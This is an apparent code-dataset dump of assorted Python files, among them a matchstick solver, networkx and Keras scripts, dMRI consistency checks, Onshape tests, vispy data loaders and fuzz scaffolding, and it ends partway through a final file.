id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
9668999 | # Спички*
import math
def matches(n):
    # https://oeis.org/A078633
    # Total sticks: two per square plus the ceil(2*sqrt(n)) closing sticks.
    closing_sticks = math.ceil(2 * math.sqrt(n))
    return 2 * n + closing_sticks
if __name__ == '__main__':
    # Read n from stdin and print the minimal matchstick count.
    n = int(input())
    print(matches(n))
| StarcoderdataPython |
6487807 | import networkx as nx
import numpy as np
# Load a graph from a GEXF file and print basic adjacency statistics.
# NOTE(review): the extension 'gefx' looks like a typo for 'gexf' — confirm
# the actual file name on disk before changing it.
G = nx.read_gexf('test.gefx', relabel=True)
print(G.nodes())
# some graph G
# NOTE(review): to_numpy_matrix is deprecated in modern networkx
# (removed in 3.0; use nx.to_numpy_array) — confirm the pinned version.
A = nx.to_numpy_matrix(G)
print(nx.diameter(G))
print(np.max(A))
print(A.shape)
# Row sums reshaped to a column vector (shape (n, 1)).
print(A.sum(axis=1)[:, np.newaxis].shape)
# A_ij is the probability that i takes the term from j
| StarcoderdataPython |
5039883 | #!/usr/bin/env python
from setuptools import setup
setup(
    # Ship non-Python assets with every package. NOTE(review): no
    # name/version here — presumably supplied via setup.cfg; confirm.
    package_data={"": ["CardDefs.xml", "Strings/*/*.txt"]},
)
| StarcoderdataPython |
12806497 | from lib.BaseModule import BaseModule
class A(BaseModule):
    """Minimal BaseModule subclass demonstrating the module hooks.

    Fix: stripped the dataset artifact (``| StarcoderdataPython |``) that
    was fused onto the last line and made the snippet invalid Python.
    """

    # Activity flag shared by all instances (class attribute).
    is_act = False

    def __init__(self):
        # NOTE(review): does not call super().__init__() — confirm
        # BaseModule needs no initialisation of its own.
        print("init")

    def fram_update(self):
        """Per-frame hook; prints a marker ("frame update") and returns 0."""
        print("帧频刷新")
        return 0
11363006 | <gh_stars>0
# -*- coding: utf-8 -*-
import rs.sqldb as sqldb
import csv
import slughifi
import simplejson as json
import os
from os.path import join as osjoin
import shutil
import re
# Load the UI translation table once at import time; `translation` is a
# module-level dict consulted by trans() below.
with open( 'trans.json', 'rb' ) as trans_file:
    content = trans_file.read()
translation = json.loads( content )
def trans( key ):
    '''Look up *key* in the global translation table.

    Prints a warning (Python 2 print statement) and returns '???' when
    the key is missing.'''
    if key not in translation:
        print 'WARNING: key %s not in translation' % key
    return translation.get( key, '???' )
def get_collection_data( post_data ):
    '''Get collection data from POST and return it in a dict.

    Returned keys: name, label, visible, parents. Note that 'parents' is
    heterogeneous: its first element is the direct parent id (int or
    None), followed by dicts describing new ancestor collections when
    the POST type is 'new'.'''
    collection_data = {
        'name'   : post_data.get( 'name', '' ),
        'label'  : post_data.get( 'label', '' ),
        'visible': post_data.get( 'vis', '' ),
        'parents': []
    }
    # 'all_colls' carries the id of the chosen direct parent, if any.
    if post_data.get( 'all_colls' ):
        direct_parent_id = int( post_data.get( 'all_colls' ) )
    else:
        direct_parent_id = None
    collection_data['parents'].append( direct_parent_id )
    if post_data.get('type') == 'new':
        # Collect consecutively numbered ancestor fields until a gap.
        i = 0
        while post_data.get( 'ancestor-name-%d' % i ):
            collection_data['parents'].append({
                'name'       : post_data.get( 'ancestor-name-%d' % i ),
                'description': post_data.get( 'ancestor-desc-%d' % i ),
                'label'      : None
            })
            i += 1
    return collection_data
def collection_data_validated( data ):
    '''Check if collection with such a name and parent does not collide with
    the other potential siblings.

    Python 2 code: filter() returns a list and the name is encoded to a
    UTF-8 byte string for comparison against db names.'''
    db_tree = sqldb.get_db_tree()
    parent_id = data['parents'][0]
    siblings = filter( lambda e: e['parent'] == parent_id, db_tree )
    # When new ancestors were posted, the first of them is the one that
    # would actually be created under the direct parent.
    name = data['name'] if len( data['parents'] ) == 1 else data['parents'][1]['name']
    return name.encode('utf-8') not in [ sib['name'] for sib in siblings ]
def hierarchy_validated( hierarchy, labels ):
    '''Check indexes of hierarchy fields. Checks if all indexes are smaller than
    maximal possible index and if they are not repeated.
    Index -1 in 'aux_index' means that it
    was not chosen, 'index' field = 1 should not happend.'''
    if hierarchy[0]['index'] == -1:
        return False
    # if user left last field empty, remove it
    # NOTE(review): this mutates the caller's hierarchy list in place.
    if len( hierarchy ) > 1 and hierarchy[-1]['index'] == -1:
        del hierarchy[-1]
    # count how many times indexes appear in hierarchy
    counter = [ 0 for _ in labels ]
    for level in hierarchy:
        column_ind = level['index']
        aux_ind = level['aux_index']
        counter[ column_ind ] -= 1
        try:
            # NOTE(review): aux_ind == -1 silently decrements the LAST
            # label's counter (Python negative indexing); the except only
            # guards against out-of-range indexes. Confirm intended.
            counter[ aux_ind ] -= 1
        except:
            # if index is beyond possible range
            pass
    # check if no index is repeated
    # NOTE(review): `x < 0` matches every USED index, not only repeated
    # ones (< -1), so the return value looks inverted relative to the
    # docstring — confirm the caller's expectation before changing.
    bad_indexes = filter( lambda x: x < 0, counter )
    return len( bad_indexes ) > 0
def save_upl_file( upl_file ):
    '''Save content of upl_file in a temporary file and return its name.

    *upl_file* is expected to expose Django's UploadedFile interface
    (chunks() and seek()) — TODO confirm against callers.'''
    tmp_name = 'tmp.csv'
    # Fix: use a context manager so the handle is closed even when a
    # chunk read/write raises (the original leaked it on error).
    with open( tmp_name, 'w' ) as tmp_file:
        for chunk in upl_file.chunks():
            tmp_file.write( chunk )
    # Rewind the upload so later readers (e.g. the header parser) start
    # from the beginning.
    upl_file.seek( 0 )
    return tmp_name
def get_header_labels( upl_file ):
    '''Get labels from the header of the uploaded file.

    Python 2 code: reader.next() and str.decode. Rewinds the file after
    reading so callers can re-read from the start.'''
    reader = csv.reader( upl_file, quotechar='"', delimiter=';' )
    header = reader.next()
    upl_file.seek( 0 )
    utf_header = [ field.decode('utf-8') for field in header ]
    return utf_header
def guess_types( file_name, hierarchy ):
    '''Try to guess types in the data file, but omit hierarchy fields.
    Return those types in the list.

    Types are guessed from the FIRST data row only (the header row is
    skipped). Python 2 code: uses reader.next().'''
    upl_file = open( file_name, 'rb' )
    reader = csv.reader( upl_file, quotechar='"', delimiter=';' )
    reader.next()
    first_line = reader.next()
    types = []
    # Get types for all fields.
    for field in first_line:
        if is_int( field ):
            types.append( get_int_type_info( field ) )
        elif is_float( field ):
            types.append( get_float_type_info( field ) )
        else:
            types.append( get_string_type_info( field ) )
    upl_file.close()
    # Remove hierarchy fields from the types list
    # (indexes come back sorted in reverse, so deletion is safe).
    hierarchy_indexes = get_hierarchy_indexes( hierarchy )
    for i in hierarchy_indexes:
        del types[i]
    return types
def get_columns_descr( hierarchy, labels, types ):
    '''Describe the non-hierarchy columns: pair each remaining label
    with its guessed type and display format.'''
    remaining_labels = labels[:]
    # Drop labels belonging to hierarchy (and auxiliary) columns; the
    # indexes come back sorted in reverse, so deleting is safe.
    for hier_ind in get_hierarchy_indexes( hierarchy ):
        del remaining_labels[ hier_ind ]
    descriptions = []
    for pos, type_info in enumerate( types ):
        descriptions.append({
            'label' : remaining_labels[ pos ],
            'type'  : type_info['type'],
            'format': type_info['format']
        })
    return descriptions
def get_hierarchy_indexes( hierarchy ):
    '''Collect the column index of every hierarchy level plus its
    auxiliary column index when present (-1 means "no column").
    Returned sorted in descending order so callers can delete by index
    safely.'''
    collected = []
    for level in hierarchy:
        for candidate in (level['index'], level['aux_index']):
            if candidate != -1:
                collected.append( candidate )
    return sorted( collected, reverse=True )
def columns_validated( columns, hierarchy, labels ):
    '''Check if all non hierarchy columns are described in columns description
    and for each column check its attributes: type, basic and processable.'''
    # Every label must be accounted for either by a hierarchy column or
    # by a described data column.
    if len( columns ) + len( get_hierarchy_indexes( hierarchy ) ) != len( labels ):
        return False
    for col in columns:
        if col['type'] not in ['string', 'number']:
            return False
        # Fix: was 'and', which let a column with exactly one invalid
        # flag pass validation; each flag must be a proper bool on its
        # own (mirrors the per-attribute checks in get_columns_errors).
        if (col['basic'] not in [True, False]) or (col['processable'] not in [True, False]):
            return False
    return True
def get_columns_errors( columns ):
    '''Build human-readable error messages (1-based column numbering)
    for columns whose type/basic/processable attributes are invalid.
    Returns an empty list when every column validates.'''
    errors = []
    for (i, col) in enumerate( columns, 1 ):
        error = []
        if col['type'] not in ['string', 'number']:
            error.append( '%s: %s' % (trans('py_wrong_type'), col['type']) )
        if col['basic'] not in [True, False]:
            error.append( '%s: %s' % (trans('py_wrong_basic'), col['basic']) )
        if col['processable'] not in [True, False]:
            # Fix: the lookup used the key 'processable ' (trailing
            # space), which raised KeyError on every invalid column.
            error.append( '%s: %s' % (trans('py_wrong_proc'), col['processable']) )
        if error != []:
            error_msg = ', '.join( error )
            errors.append( '%s %d: %s' % (trans('py_column'), i, error_msg) )
    return errors
def label_to_key( label ):
    '''Slugify *label* into a DB-safe column key (dashes become
    underscores).'''
    # need to cut because of POSTRGES max column name length
    return slughifi.slughifi(label, True).replace('-', '_')[:63]
def get_int_type_info( value ):
    '''Column descriptor for integer data (the value itself is unused;
    the parameter exists for interface symmetry with the other
    get_*_type_info helpers).'''
    return { 'type': 'number', 'format': '# ##0' }
def get_float_type_info( value ):
    '''Column descriptor for floating-point data (value unused; kept for
    interface symmetry).'''
    return { 'type': 'number', 'format': '# ##0.00' }
def get_string_type_info( value ):
    '''Column descriptor for textual data (value unused; kept for
    interface symmetry).'''
    return { 'type': 'string', 'format': '@' }
def is_int( value ):
    '''Return True if *value* parses as an int, False otherwise.

    Robustness fix: also catches TypeError, so values int() cannot
    accept at all (e.g. None) yield False instead of raising.'''
    try:
        int( value )
    except (ValueError, TypeError):
        return False
    return True
def is_float( value ):
    '''Return True if *value*, with all whitespace removed (to accept
    thousands separators like "1 234.5"), parses as a float.

    Fixes: raw string for the regex (plain '\\s' is an invalid escape
    warning on modern Python) and TypeError is caught so non-string,
    non-numeric values yield False instead of raising.'''
    try:
        parsed_value = re.sub( r'\s', '', value )
        float( parsed_value )
    except (ValueError, TypeError):
        return False
    return True
def is_string( value ):
    '''Return True if str() conversion succeeds (under Python 2 this
    catches UnicodeEncodeError, a ValueError subclass, for non-ASCII
    unicode values).'''
    try:
        str( value )
    except ValueError:
        return False
    else:
        return True
def create_desc_file( coll_data, hier, cols, user, fname):
    '''Create file describing collection with description of hierarchy, columns,
    collection's label and name, parent collections and uploader's login.

    Python 2 code: json.dumps(encoding=...) is a simplejson/Py2-only
    keyword and the result (a str) is written to a 'wb' handle.'''
    # Fill key and index fields in columns.
    columns = add_key( cols )
    columns = add_columns_indexes( columns, hier )
    # Change direct parent's index to fields describing all antecendants.
    parents = id_to_path( coll_data['parents'][0] ) + coll_data['parents'][1:]
    merged_desc = {
        'name'       : coll_data['name'],
        'description': None,
        'label'      : coll_data['label'],
        'columns'    : columns,
        'hierarchy'  : hier,
        'parents'    : parents,
        'user'       : user
    }
    with open( fname, 'wb' ) as f:
        f.write( json.dumps( merged_desc, sort_keys=True, indent=4, encoding='utf-8' ) )
def id_to_path( par_id ):
    '''Change parent id of a node in dbtree to name, description and label
    of all antecedants. Direct parent is the last element in the list.'''
    if par_id is None:
        return []
    db_tree = sqldb.get_db_tree()
    # dict: id -> name
    id_dict = dict( zip([ n['id'] for n in db_tree ], db_tree) )
    # move to next parents to get their info until top parent is reached
    path = []
    parent_id = int( par_id )
    while True:
        parent = id_dict[ parent_id ]
        path.append({
            'name': parent['name'],
            'description': parent['description'],
            'label': None
        })
        try:
            parent_id = int( parent['parent'] )
        except:
            # NOTE(review): this bare except is the loop's only exit —
            # it fires when the root's 'parent' is not int-convertible
            # (presumably None). It would also mask unrelated errors.
            break
    path.reverse()
    return path
def add_key( columns ):
    '''Add a slugified 'key' entry to every column dict.

    NOTE(review): columns[:] is only a shallow copy — the column dicts
    themselves are mutated in place, so the caller's originals gain the
    'key' field too. Confirm that is intended.'''
    columns_copy = columns[:]
    for c in columns_copy:
        c['key'] = label_to_key( c['label'] )
    return columns_copy
def add_labels( hierarchy, labels ):
    '''Add labels to hierarchy fields. Each field gets 'label', which is label
    of hierarchy column and 'aux_label' if the field has auxiliary column.

    NOTE(review): hierarchy[:] is only a shallow copy — the level dicts
    are mutated in place, so the caller's originals change as well.'''
    hierarchy_copy = hierarchy[:]
    # dict: label_index -> label
    labels_dict = dict( zip( range( len(labels) ), labels ) )
    for level in hierarchy_copy:
        level['label'] = labels_dict[ level['index'] ]
        # 'aux' flags whether this level has an auxiliary column at all.
        level['aux'] = level['aux_index'] != -1
        if level['aux_index'] != -1:
            level['aux_label'] = labels_dict[ level['aux_index'] ]
    return hierarchy_copy
def add_columns_indexes( columns, hierarchy ):
    '''Returns copy of columns with their indexes in data file added.

    Python 2 code: range() returns a list here, so `del` on it works;
    under Python 3 this would raise TypeError.
    NOTE(review): columns[:] is a shallow copy — the column dicts are
    mutated in place.'''
    columns_copy = columns[:]
    hierarchy_indexes = get_hierarchy_indexes( hierarchy )
    both_size = len( hierarchy_indexes ) + len( columns )
    columns_indexes = range( both_size )
    # Leave only non hierarchy columns' indexes
    # (hierarchy_indexes is reverse-sorted, so deleting is safe).
    for ind in hierarchy_indexes:
        del columns_indexes[ind]
    for (i, ind) in enumerate(columns_indexes):
        columns_copy[i]['index'] = ind
    return columns_copy
def move_src_file(filename, new_name):
    '''Move file with data to directory with data files.

    Destination is <cwd>/site_media/csv/<new_name>.csv; Python 2 print
    statement logs the copy.'''
    new_filename = new_name + '.csv'
    curr_path = os.getcwd()
    new_path = osjoin( curr_path, 'site_media', 'csv', new_filename )
    print 'Copy file %s to %s' % (new_filename, new_path)
    shutil.move( filename, new_path )
def remove_files( files ):
    '''Delete every path in *files* (temporary upload artifacts).'''
    for path in files:
        os.remove( path )
| StarcoderdataPython |
12846633 | <gh_stars>1-10
#!/usr/bin/env python
# ===============================================================================
# dMRIharmonization (2018) pipeline is written by-
#
# <NAME>
# Brigham and Women's Hospital/Harvard Medical School
# <EMAIL>, <EMAIL>
#
# ===============================================================================
# See details at https://github.com/pnlbwh/dMRIharmonization
# Submit issues at https://github.com/pnlbwh/dMRIharmonization/issues
# View LICENSE at https://github.com/pnlbwh/dMRIharmonization/blob/master/LICENSE
# ===============================================================================
from conversion import read_bvals, read_imgs, read_imgs_masks
import numpy as np
from warnings import warn
from plumbum import local
from util import abspath, load, isfile, getpid
from findBshells import findBShells
import sys
def check_bshells(ref_imgs, ref_bvals):
    '''Verify every image in *ref_imgs* has the same b-shells as
    *ref_bvals*; print a per-case report and raise ValueError listing
    any unmatched cases.'''
    unmatched=[]
    for imgPath in ref_imgs:
        imgPath= local.path(imgPath)
        if not imgPath.exists():
            # Fix: the exception object was instantiated but never
            # raised, silently ignoring missing files.
            raise FileNotFoundError(imgPath)
        inPrefix = abspath(imgPath).split('.nii')[0]
        bvals= findBShells(inPrefix+'.bval')
        if (bvals==ref_bvals).all():
            print('b-shells matched for', imgPath.name)
        else:
            print(f'\nUnmatched b-shells for {imgPath.name}')
            print(bvals)
            print(f'ref_bvals {ref_bvals}\n')
            unmatched.append(imgPath._path)
    print('')
    if len(unmatched):
        print('Unmatched cases:')
        print(unmatched)
        raise ValueError('Leave out the unmatched cases or change the reference case for determining b-shell to run multi-shell-dMRIharmonization')
    else:
        print('All cases have same b-shells. Data is good for running multi-shell-dMRIharmonization')
        print('')
def check_resolution(ref_imgs, ref_res):
    '''Verify every image in *ref_imgs* has the same voxel resolution as
    *ref_res*; print a per-case report and raise ValueError listing any
    unmatched cases.'''
    unmatched = []
    for imgPath in ref_imgs:
        imgPath= local.path(imgPath)
        if not imgPath.exists():
            # Fix: the exception object was instantiated but never
            # raised, silently ignoring missing files.
            raise FileNotFoundError(imgPath)
        res= load(imgPath._path).header['pixdim'][1:4]
        # Fix: compare the absolute differences — a signed sum lets
        # negative differences cancel (or pass trivially when res is
        # smaller than ref_res in every axis).
        if np.abs(res-ref_res).sum()<=10e-6:
            print('spatial resolution matched for', imgPath.name)
        else:
            print(f'\nUnmatched spatial resolution for {imgPath.name}')
            print(res)
            print(f'ref_res {ref_res}\n')
            unmatched.append(imgPath._path)
    print('')
    if len(unmatched):
        print('Unmatched cases:')
        print(unmatched)
        raise ValueError('Leave out the unmatched cases or change the reference case for determining spatial resolution to run multi-shell-dMRIharmonization')
    else:
        print('All cases have same spatial resolution. Data is good for running multi-shell-dMRIharmonization')
        print('')
def consistencyCheck(ref_csv, outputBshellFile= None, outPutResolutionFile= None):
    '''Check that all subjects listed in *ref_csv* share one set of
    b-shells and one spatial resolution; the reference values are cached
    in the two output files (or read back from them when both exist).'''
    try:
        # First column dwi, second mask.
        ref_imgs, _ = read_imgs_masks(ref_csv)
    except:
        # NOTE(review): bare except — falls back to the one-column
        # format, but would also hide unrelated parse errors.
        ref_imgs = read_imgs(ref_csv)
    if isfile(outputBshellFile) and isfile(outPutResolutionFile):
        # Reuse previously determined reference values.
        ref_bvals= read_bvals(outputBshellFile)
        ref_res = np.load(outPutResolutionFile)
    else:
        # Derive reference values from the first listed image.
        ref_bshell_img = ref_imgs[0]
        print(f'Using {ref_bshell_img} to determine b-shells')
        inPrefix = abspath(ref_bshell_img).split('.nii')[0]
        ref_bvals = findBShells(inPrefix + '.bval', outputBshellFile)
        ref_res = load(ref_bshell_img).header['pixdim'][1:4]
        np.save(outPutResolutionFile, ref_res)
    print('b-shells are', ref_bvals)
    print('\nSite', ref_csv, '\n')
    print('Checking consistency of b-shells among subjects')
    check_bshells(ref_imgs, ref_bvals)
    print('spatial resolution is', ref_res)
    print('Checking consistency of spatial resolution among subjects')
    check_resolution(ref_imgs, ref_res)
if __name__ == '__main__':
    # CLI entry point: print usage on -h/--help or no arguments,
    # otherwise run the consistency check with the three given paths.
    if len(sys.argv)==1 or sys.argv[1]=='-h' or sys.argv[1]=='--help':
        print('''Check consistency of b-shells and spatial resolution among subjects
Usage:
consistencyCheck list.csv/txt ref_bshell_bvalues.txt ref_res_file.npy
Provide a csv/txt file with first column for dwi and 2nd column for mask: dwi1,mask1\\ndwi2,mask2\\n...
or just one column for dwi1\\ndwi2\\n...
In addition, provide ref_bshell_bvalues and ref_res_file.''')
        exit()
    ref_csv= abspath(sys.argv[1])
    outputBshellFile= abspath(sys.argv[2])
    outPutResolutionFile= abspath(sys.argv[3])
    if isfile(ref_csv):
        consistencyCheck(ref_csv, outputBshellFile, outPutResolutionFile)
    else:
        raise FileNotFoundError(f'{ref_csv} does not exists.')
| StarcoderdataPython |
3434574 | from create_project import *
from packaging import *
from plugins import *
| StarcoderdataPython |
6567667 | <filename>python/test/test_onshape_url.py<gh_stars>10-100
from __future__ import print_function
import json
import pint
import pytest
from onshape_client.assembly import AssemblyDefinition
from onshape_client.onshape_url import OnshapeElement, ConfiguredOnshapeElement
from onshape_client.units import u
ureg = pint.UnitRegistry()
def test_creation_from_urls():
    # The 'configuration' query parameter must come back URL-decoded
    # (%3D -> '=') when an OnshapeElement is built from a raw URL.
    assert (
        OnshapeElement(
            "https://cad.onshape.com/documents/c8f8013d34183b1de74fa930/w/574b77701d8b74987c273500/e/455ef770951fe37de0b8ff08?configuration=List_TOpkWtvolR0KY4%3Dewf"
        ).configuration
        == "List_TOpkWtvolR0KY4=ewf"
    )
def test_assembly_structural_equivalence(json_assets):
    # json_assets is a pytest fixture pointing at the test asset folder;
    # a copied assembly must compare as structurally equal.
    asm1 = AssemblyDefinition(
        json.load((json_assets / "assembly_definition_three_axes").open())
    )
    asm2 = AssemblyDefinition(
        json.load((json_assets / "assembly_definition_three_axes_copied").open())
    )
    assert asm1.is_structurally_equal_assembly(asm2)
@pytest.mark.parametrize("element", ["ps_configurable_cube"], indirect=True)
def test_configuration_update(element):
    # Exercises ConfiguredOnshapeElement: the default configuration map
    # and the URL-encoded configuration string after successive updates.
    element = ConfiguredOnshapeElement(element.get_url())
    assert element._get_default_configuration_map() == {
        "size": 500 * u.inch,
        "edge_configuration": "Default",
        "show_cube": True,
    }
    # Updating a single key keeps the other defaults in the URL.
    element.update_current_configuration({"size": 20 * ureg.m})
    assert (
        element.get_url_with_configuration()
        == "https://cad.onshape.com/documents/cca81d10f239db0db9481e6f/v/6ccf88eb92d55be180c06cf9/e/69c9eedda86512966b20bc90?configuration=edge_configuration%3DDefault%3Bshow_cube%3DTrue%3Bsize%3D20%2Bmeter"
    )
    element.update_current_configuration(
        {"size": 40 * u.inch, "edge_configuration": "chamfered"}
    )
    assert (
        element.get_url_with_configuration()
        == "https://cad.onshape.com/documents/cca81d10f239db0db9481e6f/v/6ccf88eb92d55be180c06cf9/e/69c9eedda86512966b20bc90?configuration=edge_configuration%3Dchamfered%3Bshow_cube%3DTrue%3Bsize%3D40%2Binch"
    )
    element.update_current_configuration(
        {"size": 10 * u.inch, "edge_configuration": "chamfered", "show_cube": False}
    )
    assert (
        element.get_url_with_configuration()
        == "https://cad.onshape.com/documents/cca81d10f239db0db9481e6f/v/6ccf88eb92d55be180c06cf9/e/69c9eedda86512966b20bc90?configuration=edge_configuration%3Dchamfered%3Bshow_cube%3DFalse%3Bsize%3D10%2Binch"
    )
| StarcoderdataPython |
5158384 | <reponame>tjbanks/bmtk
from temporalfilter import TemporalFilterCosineBump
from transferfunction import ScalarTransferFunction
from linearfilter import SpatioTemporalFilter
import numpy as np
from spatialfilter import GaussianSpatialFilter
from cellmodel import OnUnit, OffUnit
| StarcoderdataPython |
1763675 | <reponame>ashdnazg/toppy<gh_stars>0
import numpy as np
from ..system_stat import MemoryStat
from . import common
from .animated import AnimatedAxes
class MemoryPlotter(AnimatedAxes):
    """Animated axes plotting memory and swap usage as percentages."""

    def __init__(self, mem=None):
        # Allow injecting a stat source for testing; default to a fresh
        # MemoryStat.
        self.mem = mem or MemoryStat()

    def setup(self, axes, x):
        """Initialise the axes and the two line artists over x; returns
        the line list for the animation framework."""
        self.mem.setup()
        self.y_mem = common.none_array(x.size)
        self.y_swap = common.none_array(x.size)
        self.line_mem = axes.plot(x, self.y_mem, label='Memory')[0]
        self.line_swap = axes.plot(x, self.y_swap, label='Swap')[0]
        self.lines = [self.line_mem, self.line_swap]
        axes.set_title('Memory')
        axes.set_ylabel('% Memory')
        axes.set_xlim(x.min(), x.max())
        # Percentages: fix the y range at 0-100.
        axes.set_ylim(0, 100)
        axes.tick_params('x', bottom=False, labelbottom=False)
        axes.grid(True, axis='y')
        axes.legend()
        return self.lines

    def update(self):
        """Poll the stat source, push the newest used/total percentages
        into the cyclic buffers and refresh both lines."""
        self.mem.update()
        common.additem_cyclic_inplace(self.y_mem, self.mem.mem.used * 100 / self.mem.mem.total)
        common.additem_cyclic_inplace(self.y_swap, self.mem.swap.used * 100 / self.mem.swap.total)
        self.line_mem.set_ydata(self.y_mem)
        self.line_swap.set_ydata(self.y_swap)
        return self.lines
| StarcoderdataPython |
3450056 |
from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _
class MapsPluginConfig(AppConfig):
    """Django app configuration for the cmsplugins.maps plugin."""
    default_auto_field = 'django.db.models.AutoField'
    name = 'cmsplugins.maps'
    # Human-readable, translatable app name shown in the admin.
    verbose_name = _('Maps Plugin')
| StarcoderdataPython |
5151616 | #!/usr/bin/env python3
# coding=utf-8
#
# Copyright (c) 2021 Huawei Device Co., Ltd.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import subprocess
from xdevice import platform_logger
LOG = platform_logger("Gen")
class Gen(object):
    """Generator for fuzz-test scaffolding.

    Fix: stripped the dataset artifact (``| StarcoderdataPython |``)
    that was fused onto the last line and made the snippet invalid
    Python. Logic is unchanged.
    """

    def process_command_gen(self, options):
        """Validate the CLI options and dispatch FUZZ generation."""
        if (len(options.testtype) != 1) or (options.dirpath == "") or \
                (options.fuzzername == ""):
            LOG.error(
                "GEN need para -t(testtype) -fz(fuzzername) -dp(dirpath)")
            return
        if "FUZZ" in options.testtype:
            self.fuzz_dir_generation(options)
        else:
            LOG.error("GEN is not support %s." % options.testtype)

    def gen_fuzzer_list_file(self, fuzzer_list):
        """Rewrite fuzzer_list.txt with one quoted target per line."""
        filepath = os.path.join(sys.source_code_root_path, "test",
                                "developertest", "libs", "fuzzlib", "fuzzer_list.txt")
        LOG.info("The fuzzer list file path: %s" % filepath)
        with open(filepath, "w") as gn_file:
            gn_file.truncate(0)
            if fuzzer_list:
                for target in fuzzer_list:
                    if target:
                        gn_file.write("\"%s\",\n" % target)

    @classmethod
    def fuzz_dir_generation(cls, options):
        """Create the fuzz directory (if needed) and run fuzzer_helper.py
        to generate the named fuzzer inside it."""
        helper_path = os.path.join("..", "libs", "fuzzlib", "fuzzer_helper.py")
        fuzz_path = os.path.join(sys.source_code_root_path, options.dirpath)
        LOG.info("fuzz_path = %s" % fuzz_path)
        if not os.path.exists(fuzz_path):
            os.makedirs(fuzz_path)
            LOG.info("make folder %s" % fuzz_path)
        command = [sys.executable, helper_path, 'generate',
                   options.fuzzername, fuzz_path]
        LOG.info("command %s" % command)
        subprocess.call(command, shell=False)
4985632 | <gh_stars>10-100
#-----------------------------------------------------------------------------------------------------------------------
# Project: resnet-finetune-demo
# Filename: train.py
# Date: 16.06.2017
# Author: <NAME> - CTA.ai
#-----------------------------------------------------------------------------------------------------------------------
"""
Performs training of a single fully-connected classifier layer on a cached set of feature vectors prepared with
build_features.py. Trained model is saved to classifier_weights.h5.
"""
import os
import numpy as np
import keras
from keras.callbacks import ModelCheckpoint, ReduceLROnPlateau
from keras.layers import Dense
from keras.models import Sequential
from keras.optimizers import SGD
# Paths to the cached feature vectors / labels produced by build_features.py.
TRAIN_DIR = os.path.expanduser("~/ml/data/indoor/train")
VAL_DIR = os.path.expanduser("~/ml/data/indoor/val")
FEATURES_FILENAME = "features-resnet152.npy"
LABELS_FILENAME = "labels-resnet152.npy"
WEIGHTS_CLASSIFIER = "classifier_weights.h5"
# Load train data (labels converted to one-hot).
train_features = np.load(os.path.join(TRAIN_DIR, FEATURES_FILENAME))
train_labels = np.load(os.path.join(TRAIN_DIR, LABELS_FILENAME))
train_labels = keras.utils.np_utils.to_categorical(train_labels)
# Load val data
val_features = np.load(os.path.join(VAL_DIR, FEATURES_FILENAME))
val_labels = np.load(os.path.join(VAL_DIR, LABELS_FILENAME))
val_labels = keras.utils.np_utils.to_categorical(val_labels)
# Build softmax model: a single dense layer on top of the cached
# ResNet features (67 outputs — presumably the MIT Indoor-67 classes;
# confirm against the dataset).
classifier_model = Sequential()
classifier_model.add(Dense(67, activation='softmax',
                           kernel_initializer='TruncatedNormal',
                           bias_initializer='zeros',
                           input_shape=train_features.shape[1:]))
# Define optimizer and compile
opt = SGD(lr=0.1)
classifier_model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])
# Prepare callbacks: decay LR on plateau, checkpoint only the best
# (by validation loss) weights to WEIGHTS_CLASSIFIER.
lr_decay = ReduceLROnPlateau(factor=0.9, patience=1, verbose=1)
checkpointer = ModelCheckpoint(filepath=WEIGHTS_CLASSIFIER, save_best_only=True, verbose=1)
# Train
classifier_model.fit(train_features, train_labels,
                     epochs=50,
                     batch_size=256,
                     validation_data=(val_features, val_labels),
                     callbacks=[lr_decay, checkpointer])
| StarcoderdataPython |
9274 | # -*- coding: utf-8 -*-
# Copyright (c) Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
import numpy as np
from os import path as op
from ..util import load_data_file
# This is the package data dir, not the dir for config, etc.
DATA_DIR = op.join(op.dirname(__file__), '_data')
def load_iris():
    """Load the iris dataset

    Returns
    -------
    iris : NpzFile
        data['data'] : a (150, 4) NumPy array with the iris' features
        data['group'] : a (150,) NumPy array with the iris' group
    """
    # load_data_file downloads/caches the archive on first use.
    return np.load(load_data_file('iris/iris.npz',
                                  force_download='2014-09-04'))
def load_crate():
    """Load an image of a crate

    Returns
    -------
    crate : array
        256x256x3 crate image.
    """
    return np.load(load_data_file('orig/crate.npz'))['crate']
def pack_unit(value):
    """Packs float values between [0,1] into 4 unsigned int8

    Each pass multiplies the remaining fraction by 256 and stores the
    integer part, so the four bytes hold successively finer digits.

    Returns
    -------
    pack: array
        packed interpolation kernel
    """
    packed = np.zeros(value.shape + (4,), dtype=np.ubyte)
    remainder = value
    for byte_idx in range(4):
        remainder, packed[..., byte_idx] = np.modf(remainder * 256.)
    return packed
def pack_ieee(value):
    """Packs float ieee binary representation into 4 unsigned int8

    Returns
    -------
    pack: array
        packed interpolation kernel
    """
    # Fix: np.fromstring on binary data has been deprecated for years
    # and is removed in NumPy 2.0; frombuffer is the supported
    # equivalent. copy() keeps the result writable, matching
    # fromstring's behaviour.
    packed = np.frombuffer(value.tobytes(), np.ubyte).copy()
    return packed.reshape(value.shape + (4,))
def load_spatial_filters(packed=True):
    """Load spatial-filters kernel

    Parameters
    ----------
    packed : bool
        Whether or not the data should be in "packed" representation
        for use in GLSL code.

    Returns
    -------
    kernel : array
        16x1024x4 (packed float in rgba) or
        16x1024 (unpacked float)
        16 interpolation kernel with length 1024 each.
    names : tuple of strings
        Respective interpolation names, plus "Nearest" which does
        not require a filter but can still be used
    """
    names = ("Bilinear", "Hanning", "Hamming", "Hermite",
             "Kaiser", "Quadric", "Bicubic", "CatRom",
             "Mitchell", "Spline16", "Spline36", "Gaussian",
             "Bessel", "Sinc", "Lanczos", "Blackman", "Nearest")
    kernel = np.load(op.join(DATA_DIR, 'spatial-filters.npy'))
    if packed:
        # convert the kernel to a packed representation
        kernel = pack_unit(kernel)
    return kernel, names
| StarcoderdataPython |
3555707 | <gh_stars>0
# -*- coding: utf-8 -*-
import sys
import codecs
import json
import numpy as np
import random
